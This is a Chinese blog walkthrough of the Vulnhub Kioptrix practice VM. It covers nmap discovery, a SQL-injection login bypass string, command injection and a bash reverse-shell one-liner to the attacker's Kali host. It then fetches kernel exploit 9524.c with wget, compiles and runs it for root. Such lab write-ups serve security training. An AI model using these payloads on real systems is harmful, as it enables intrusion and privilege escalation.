Vunlnhub之Kioptrix渗透实战

最新推荐文章于 2024-06-08 21:08:25 发布
最新推荐文章于 2024-06-08 21:08:25 发布
阅读量438 收藏
点赞数 1
分类专栏: 信息安全 文章标签: vulnhub Kioptrix
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43862283/article/details/89785687
版权

Kioptrix渗透实战

1、环境简介
难度:简单
网络:桥接自动分配IP地址

2、主机发现

   nmap -sP 192.168.34.0/24

3、漏洞发现
访问主页面,是一个登录界面,尝试使用万能用户名登录
在这里插入图片描述

1' or 1=1#

4、命令执行,反弹shell
返回一个框,ping目标主机,存在命令注入漏洞

在这里插入图片描述
kali监听,bash反弹shell

bash -i >& /dev/tcp/192.168.34.179/8888 0>&1

在这里插入图片描述

5、提权
查看内核版本,使用exp提权
在这里插入图片描述
确定内核版本后,尝试好几次,最后确定为9524.c
在这里插入图片描述
打开kali服务器(或者搭建建议服务器)

wget http://192.168.34.179:8888/9524.c

进行编译并运行

bash-3.00$ gcc -o 1 9524.c
bash-3.00$ ./1

获取root权限,并查看flag文件

NineMeet_111
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网站渗透实战试验(仅供参考)
amaoatao的博客
03-10 5685
首先收集必要的信息 发现存在php探针,phpinfo,phpmyadmin 常用的垃圾弱口令登录失败。 尝试登录后台,网站使用帝国cms7.2系统 弱口令登录失败,使用网络上帝国cms的通用漏洞,行不通失败。 在知道绝对路径的情况下,dba权限的sql注入可以直接执行os-shell命令拿shell(下载帝国下来看!)。 扫描开放端口,反查域名,寻找最可能存在sql注入的网站。...
Vunlhub靶场 Kioptrix 1
m0_57221101的博客
02-18 233
勘探 nmap探查 port 备注 22 openSSH2.9 80 apache 1.3.20 111 rpcbind 139 smb 443 1024 80web 443同80 dirsearch进行一下目录爆破 python3.9 dirsearch.py -u 192.168.1.103 [20:16:17] 200 - 3KB - /index.html
web渗透实例
12-08
一次艰难的渗透纪实,不容错过,真实web入侵纪实!
逻辑漏洞-客户端验证的邮箱-Web渗透实例之中国教育部青少年普法网站逻辑漏洞...
aiquan9342的博客
03-27 743
转载自:http://www.zmnhssn.com/?post=61 漏洞地址:https://user.qspfw.com 用户登陆界面 具体漏洞地址: 用户密码找回界面:https://user.qspfw.com/page/user/findpwd/forget_pwd.do 这里可以确认网站有没有这个用户,这个用户也是在其他页面找的,貌似还是个妹子。 然后...
vuInhub靶场实战系列--Kioptrix Level #1
最新发布
weixin_45221204的博客
06-08 1277
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将进行Kioptrix Level #1靶机渗透测试,内容包括主机扫描、目录扫描、漏洞发现、linux内核提权等内容。主机发现端口扫描目录扫描漏洞发现payload利用linux内核提权。
某网站(JSP + Access) 渗透 实例 ( eWebEditor 漏洞 )
Knove的博客
04-15 3166
某网站后台是用的   蓝滨新闻系统精简加强版 即如图:可见,后台是JSP + Access,虽然这个新闻系统标题写了是安全性加强版本,但是对于这种系统我还是很感兴趣的。根据这个系统的源代码,找这个系统的漏洞。manage/htmledit/eWebEditor.asp sSql = "select * from ewebeditor_style where s_name='" & sSty...
【实战案例】——实战渗透某不法网站
热门推荐
Demo不是emo的博客
11-21 2万+
新开了一个专栏介绍博主遇到的一些比较有意思的实战环境和渗透流程,希望对大家有所帮助
Vunlhub靶场 Kioptrix 3
m0_57221101的博客
02-18 369
勘探 nmap探查 port 备注 22/tcp openssh 4.7p1 80/tcp apache 2.2.8 80web 主页是这样的 有一个登录界面 发现这个cms有一个rce漏洞 然后目录扫描出很多东西 python3.9 dirsearch.py -u 192.168.1.104 [20:51:48] 200 - 2KB - /cache/ [
VnlnHub EvilBox---One
weixin_45682839的博客
09-07 916
VnlnHub EvilBox---One靶场通关攻略记录,涉及知识包括:端口服务探测、铭感目录搜集、参数爆破、任意文件包含漏洞、任意文件读取、ssh私钥爆破、linux本地提权(系统权限漏洞提权)
一次对在线挂机网站的渗透的例子
jahn的专栏
10-16 1092
网页跑的是iis的.说不定能注入.结果是预料之中的.注入漏洞不存在. 既然网页没漏洞的话.系统漏洞存在的可能性就微乎其微了,我还是去别处看看好了.随便转了下.跑到登录的界面,居然有个测试,嘿嘿.有机会了. 登录后发现其实所谓的远程挂机平台,在线挂机什么的只是个网页版的远程终端而已.这下有好戏看了.哇哈哈`` 道理很简单,既然我们能上终端服务器,那么我们肯定有一定的权限,我们
网站综合渗透及实例演示一.zip
weixin_33937499的博客
07-12 94
网站综合渗透及实例演示一.zip 点击进入高速下载通道 转载于:https://www.cnblogs.com/gwrjy/p/7157653.html
记一次对某网站的简单渗透
weixin_44695144的博客
06-11 768
事情是这样的,下午闲来无事,由于最近学习了逻辑支付漏洞,就想着挖一下。随后我便打开了某网站;在尝试了多次无果后,我将注意力放到了路径上,之后有趣的事情发生了。 他起初的路径是这样的 看到这个路径总想做点什么,看他会不会有目录遍历的漏洞。随后在clientarea.php后面添加了./和…/分别进行测试。 观察页面刷新一下还是当前页面。继续输入 …/继续测试 发现页面跳转到clientarea.php的上级目录/whmcs下 基本确认存在目录遍漏洞,为了再次确认一下,又继续在后面添加…/…/的路径。
VunlnHub—CTF4
qq_45434762的博客
05-21 474
主机发现使用nmap扫描网段,寻找靶机IP地址sudo nmap 192.168.169.1/24 靶机的IP是192.168.169.143端口探测使用nmap进一步探测目标主机开放的...
vulnhub渗透系列之bulldog
来到了学渣的博客
01-20 1679
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结: 1. 对端口信息扫描、信息的收集 2. 用dirb扫出了许多关键目录 3. 仔细观察每一个细节,这个靶机主要在/dev目录处前端源码泄露了MD5密码信息 4. 登录了管理员账号后可以在/dev/shell页面利用命令注入漏洞 5. 搭建临时...
VnlnHub pyexpvm
weixin_45682839的博客
10-21 650
涉及知识:端口服务探测、密码爆破、mysql提权、加解密、linux本地提权
Vunlnhub:靶机DC-9渗透详解
m0_65712192的博客
03-06 1099
Vunlnhub:靶机DC-9渗透详解
vulnhub-Kioptrix2014靶场
shulao2010的博客
05-26 384
通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击
VulnHub-Kioptrix2014(#5)
江左盟的博客
07-21 1万+
信息收集 是 啊 啊 啊
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 9427
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值